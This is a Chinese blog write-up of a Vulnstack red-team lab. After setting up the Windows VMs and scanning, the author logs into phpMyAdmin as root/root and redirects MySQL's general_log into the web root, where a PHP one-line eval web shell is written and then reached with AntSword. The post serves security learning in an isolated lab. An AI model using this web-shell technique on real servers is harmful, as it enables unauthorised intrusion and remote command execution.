靶機練習 - ATT&CK紅隊實戰靶場 - 1. 環境搭建和漏洞利用


最近某個公眾號介紹了網上的一套環境,這個環境是多個Windows靶機組成的,涉及到內網滲透,正好Windows和內網滲透一直沒怎么接觸過,所以拿來學習下。

下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

 

環境配置和檢查

加上kali一共四台虛擬機。

win7 x64

需要配置兩張網卡,一個在內網網段,一個在外網網段,配置如下(VM默認只有一張網卡,自己添加一個網絡適配器就好了),內網網絡配置為特定虛擬網絡:

 

兩台內網服務器,網絡配置如下:

kali虛擬機應只能連到外網,也就是和win7的外網網卡在同一網段,但無法訪問內網網段,網絡配置如下:

啟動win7虛擬機C盤下的phpstudy:

最后內網的三台虛擬機互相ping一下,保證能ping通。

 

信息收集

 kali掃一下ip,win7外網網址為:192.168.174.135:

對win7進行端口掃描:

 

 80端口是一個網站,發現網站底部有一個MySQL數據庫連接檢測:

嘗試輸入用戶名和密碼root/root,連上了。。。就。。。挺突然的。。。

再對網站進行掃描,發現phpinifo.php和phpmyadmin頁面:

 

漏洞利用

第一步信息收集找到了php后台管理頁面以及mysql的root密碼,接下來嘗試利用這個漏洞getshell從而控制發布網站的這台主機。

訪問http://192.168.174.135/phpmyadmin/,並用弱密碼root/root登錄,利用方式有兩種:

1. 利用into outfile直接寫入shell文件

show variables like '%secure%'

 很遺憾secure_file_priv的值是NULL,也就是不允許導入導出,如果嘗試寫入shell文件會失敗:

2.利用日志getshell

開啟mysql日志功能:

show global variables like '%general%'

set global general_log='ON'

將日志文件的存放位置修改為當前網站的根目錄:

set global  general_log_file = 'C:/phpStudy/WWW/shell.php'

執行語句:

SELECT '<?php @eval($_POST["cmd"]); ?>'

用蟻劍連接:

 

當前域名為god,登錄用戶是admin:

 

本文僅用於技術學習和交流,嚴禁用於非法用途,否則產生的一切后果自行承擔。  

如需轉載,請注明出處,這是對他人勞動成果的尊重。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM